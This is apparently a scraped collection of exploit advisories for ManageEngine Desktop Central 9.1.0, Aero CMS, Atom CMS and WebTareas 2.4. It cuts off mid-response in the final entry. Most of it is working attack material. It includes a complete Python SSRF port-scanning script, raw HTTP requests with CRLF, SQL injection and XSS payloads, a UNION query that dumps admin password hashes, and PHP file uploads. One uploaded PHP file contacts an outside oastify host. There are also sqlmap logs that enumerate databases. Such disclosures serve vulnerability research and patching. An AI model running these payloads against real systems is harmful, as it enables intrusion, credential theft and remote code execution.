ISHACK AI BOT

# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-02-14 # Software Link : http://www.desktopcentral.com # Tested Version: 9.1.0 (Build No: 91084) # Tested on: Windows 10 # Vulnerability Type: CRLF injection (CRLF) - 1 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost Response: HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv X-dc-header: yes Content-Length: 95 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive Content-Type: text/csv;charset=UTF-8 # Vulnerability Type: CRLF injection (CRLF) - 2 CVSS v3: 6.1 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-93 Vulnerability description: CRLF injection vulnerability in ManageEngine Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the fileName parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. Proof of concept: GET https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 DNT: 1 Connection: keep-alive Referer: https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering Upgrade-Insecure-Requests: 1 Content-Length: 0 Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; showRefMsg=false; summarypage=false; DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; JSESSIONID=0B20DEF653941DAF5748931B67972CDB; JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 Host: localhost HTTP/1.1 200 OK Date: Server: Apache Pragma: public Cache-Control: max-age=0 Expires: Wed, 31 Dec 1969 16:00:00 PST SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; Secure Set-Cookie: buildNum=91084; Path=/ Set-Cookie: showRefMsg=false; Path=/ Set-Cookie: summarypage=false; Path=/ Set-Cookie: dc_customerid=1; Path=/ Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ Set-Cookie: screenResolution=1280x1024; Path=/ Content-Disposition: attachment; filename=any Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 X-dc-header: yes Content-Length: 4470 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf;charset=UTF-8 # Vulnerability Type: Server-Side Request Forgery (SSRF) CVSS v3: 8.0 CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H CWE: CWE-918 Server-Side Request Forgery (SSRF) Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability in ManageEngine Desktop Central 9.1.0 allows an attacker can force a vulnerable server to trigger malicious requests to third-party servers or to internal resources. This vulnerability allows authenticated attacker with network access via HTTP and can then be leveraged to launch specific attacks such as a cross-site port attack, service enumeration, and various other attacks. Proof of concept: Save this content in a python file (ex. ssrf_manageenginedesktop9.py), change the variable sitevuln value with ip address: import argparse from termcolor import colored import requests import urllib3 import datetime urllib3.disable_warnings() print(colored(''' ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ ''',"red")) def smtpConfig_ssrf(target,port,d): now1 = datetime.datetime.now() text = '' sitevuln = 'localhost' url = 'https:// '+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% 40manageengine.com &validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% 40manageengine.com' cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; JSESSIONID=D10A9C62D985A0966647099E14C622F8; DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' try: response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' https://192.168.56.250:8383/smtpConfig.do','Cookie': cookie,'Connection': 'keep-alive'},verify=False, timeout=10) text = response.text now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if ('updateRefMsgCookie' in text): return colored('Cookie lost',"yellow") if d == "0": print ('Time response: ' + str(rest) + '\n' + text + '\n') if (seconds > 5.0): return colored('open',"green") else: return colored('closed',"red") except: now2 = datetime.datetime.now() rest = (now2 - now1) seconds = rest.total_seconds() if (seconds > 10.0): return colored('open',"green") else: return colored('closed',"red") return colored('unknown',"yellow") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 - SSRF Open ports",required=True) parser.add_argument('-d','--debug', help="ManageEngine Desktop Central 9 - SSRF Open ports (0 print or 1 no print)",required=False) args = parser.parse_args() timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) print (args.ip + ':' + args.port + ' ' + timeresp + '\n') And: $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:8080 open $ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 ------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ 192.168.56.250:7777 closed

# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example SQL Injection ----------------------------------------------------------------------------------------------------------------------- Param: search ----------------------------------------------------------------------------------------------------------------------- Req sql ini detect ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692'&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:06 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3466 Connection: close Content-Type: text/html; charset=UTF-8 [...] Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 21 search=245692''&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 03:07:10 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94216 [...] ----------------------------------------------------------------------------------------------------------------------- Req exploiting sql ini get data admin ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/search.php HTTP/1.1 Host: 127.0.0.1 Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57 Origin: http://127.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://127.0.0.1/AeroCMS-master/ Content-Type: application/x-www-form-urlencoded Accept-Language: en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 113 search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit= ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 05:40:05 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 101144 [...] <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a> [...] ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [filename] /AeroCMS-master/admin/profile.php [filename] /AeroCMS-master/author_posts.php [author] /AeroCMS-master/category.php [category] /AeroCMS-master/post.php [p_id] /AeroCMS-master/search.php [search] /AeroCMS-master/admin/categories.php [cat_title] /AeroCMS-master/admin/categories.php [phpwcmsBELang cookie] /AeroCMS-master/admin/posts.php [post_content] /AeroCMS-master/admin/posts.php [p_id] /AeroCMS-master/admin/posts.php [post_category_id] /AeroCMS-master/admin/posts.php [post_title] /AeroCMS-master/admin/posts.php [reset]

# Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/MegaTKC/AeroCMS # Software Link: https://github.com/MegaTKC/AeroCMS # Version: 0.0.1 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: image content uploading image ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116 Content-Length: 1156 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_title" mmmmmmmmmmmmmmmmm -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_category_id" 1 -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_user" admin -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_status" draft -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="image"; filename="at8vapghhb.php" Content-Type: text/plain <?php printf("bh3gr8e32s".(7*6)."ci4hs9f43t");gethostbyname("48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com");?> -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_tags" -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="post_content" <p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p> -----------------------------369779619541997471051134453116 Content-Disposition: form-data; name="create_post" Publish Post -----------------------------369779619541997471051134453116-- ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.

# Exploit Title: Atom CMS v2.0 - SQL Injection (no auth) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://github.com/thedigicraft/Atom.CMS # Software Link: https://github.com/thedigicraft/Atom.CMS # Version: 2.0 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: id ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /Atom.CMS-master/admin/index.php?page=users&id=(select*from(select(sleep(10)))a) HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 93 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/Atom.CMS-master/admin/index.php?page=users&id=1 Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 first=Alan2n&last=Quandt&email=alan%40alan.com&status=1&password=&passwordv=&submitted=1&id=1 --------------------------------------------------------------------------------------------------------------------- -- Response wait 10 sec ----------------------------------------------------------------------------------------------------------------------- Other URL and params ----------------------------------------------------------------------------------------------------------------------- /Atom.CMS-master/admin/index.php [email] /Atom.CMS-master/admin/index.php [id] /Atom.CMS-master/admin/index.php [slug] /Atom.CMS-master/admin/index.php [status] /Atom.CMS-master/admin/index.php [user]

# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example ----------------------------------------------------------------------------------------------------------------------- Param: webTareasSID in cookie ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/administration/admin.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout Connection: close Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'' Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Sat, 15 Oct 2022 11:38:50 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../service_site/home.php?msg=permissiondenied Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/administration/admin.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout Connection: close Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z' Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 302 Found Date: Sat, 15 Oct 2022 11:38:39 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../service_site/home.php?msg=permissiondenied Content-Length: 355 Connection: close Content-Type: text/html; charset=UTF-8 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /> <b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br /> ----------------------------------------------------------------------------------------------------------------------- SQLMap: ----------------------------------------------------------------------------------------------------------------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: Cookie #1* ((custom) HEADER) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 [11:49:03] [INFO] testing MySQL [11:49:03] [INFO] confirming MySQL do you want to URL encode cookie values (implementation specific)? [Y/n] Y [11:49:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.4.30, Apache 2.4.54 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [11:49:03] [INFO] fetching database names [11:49:04] [INFO] starting 6 threads [11:49:06] [INFO] retrieved: 'zxcv' [11:49:06] [INFO] retrieved: 'information_schema' [11:49:06] [INFO] retrieved: 'performance_schema' [11:49:06] [INFO] retrieved: 'test' [11:49:06] [INFO] retrieved: 'phpmyadmin' [11:49:06] [INFO] retrieved: 'mysql' available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] zxcv [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1' [11:49:06] [WARNING] your sqlmap version is outdated [*] ending @ 11:49:06 /2022-10-15/

# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Proof Of Concept ----------------------------------------------------------------------------------------------------------------------- Param: searchtype ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 07:46:31 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 11147 [...] <form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)"> [...] ----------------------------------------------------------------------------------------------------------------------- Other vulnerable url and params: ----------------------------------------------------------------------------------------------------------------------- /webtareas/administration/print_layout.php [doc_type] /webtareas/general/login.php [logout] /webtareas/general/login.php [session] /webtareas/general/newnotifications.php [msg] /webtareas/general/search.php [searchtype] /webtareas/administration/print_layout.php [doc_type]

# Exploit Title: WebTareas 2.4 - RCE (Authorized) # Date: 15/10/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: hub.woj12345@gmail.com # Vendor Homepage: https://sourceforge.net/projects/webtareas/ # Software Link: https://sourceforge.net/projects/webtareas/ # Version: 2.4 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ## Example in forum -> members forum -> chat ----------------------------------------------------------------------------------------------------------------------- Param: chatPhotos0 ----------------------------------------------------------------------------------------------------------------------- Req ----------------------------------------------------------------------------------------------------------------------- POST /webtareas/includes/chattab_serv.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126 Content-Length: 6852 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="action" sendPhotos -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatTo" 2 -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatType" P -----------------------------13392153614835728094189311126 Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php" Content-Type: image/png PNG [...] <?php phpinfo();?> [...] ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sat, 15 Oct 2022 11:27:41 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: 